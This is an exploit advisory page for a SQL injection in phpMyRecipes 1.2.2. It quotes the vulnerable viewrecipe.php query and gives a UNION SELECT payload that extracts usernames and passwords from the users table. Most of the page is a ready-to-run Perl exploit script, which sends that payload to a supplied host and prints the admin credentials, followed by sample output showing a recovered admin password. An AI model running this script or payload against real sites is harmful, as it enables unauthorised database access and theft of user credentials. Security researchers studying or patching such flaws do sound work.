phpMyRecipes 1.2.2 SQL Injection

2013.02.21
Credit: cr4wl3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#phpMyRecipes 1.2.2 SQL Injection Exploit #By cr4wl3r http://bastardlabs.info #Script: http://sourceforge.net/projects/php-myrecipes/files/ #Demo: http://bastardlabs.info/demo/phpMyRecipes.png #Tested: Ubuntu Linux # # Bugs found in viewrecipe.php # # $r_id = $_GET['r_id']; # # if (! ($result = mysql_query("SELECT # name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) { # dberror("viewrecipe.php", "Cannot select recipe"); # } # # http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=[SQLi] # Example: http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users # # # $ perl recipes.pl localhost /demo/ # [+] Please Wait ... # # [+] Getting Username and Password [ ok ] # [+] w00tw00t # [+] Username | Password --> admin:mps4BNRRjh3po #!/usr/bin/perl use IO::Socket; $host = $ARGV[0]; $path = $ARGV[1]; if (@ARGV < 2) { print qq( +---------------------------------------------+ | phpMyRecipes 1.2.2 SQL Injection Exploit | | | | coded & exploited by cr4wl3r | | http://bastardlabs.info/ | +---------------------------------------------+ -=[X]=- +--------------------------------------- Usage : perl $0 <host> <path> ex : perl $0 127.0.0.1 /phpMyRecipes/ +--------------------------------------- ); } $target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n"; print "[+] Please Wait ...\n"; print $sock "GET $target HTTP/1.1\n"; print $sock "Accept: */*\n"; print $sock "User-Agent: BastardLabs\n"; print $sock "Host: $host\n"; print $sock "Connection: close\n\n"; sleep 2; while ($answer = <$sock>) { if ($answer =~ /<B>(.*?)<\/B>/) { print "\n[+] Getting Username and Password [ ok ]\n"; sleep 1; print "[+] w00tw00t\n"; print "[+] Username | Password --> $1\n"; exit(); } } print "[-] Exploit Failed !\n";

References:

http://sourceforge.net/projects/php-myrecipes/files/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top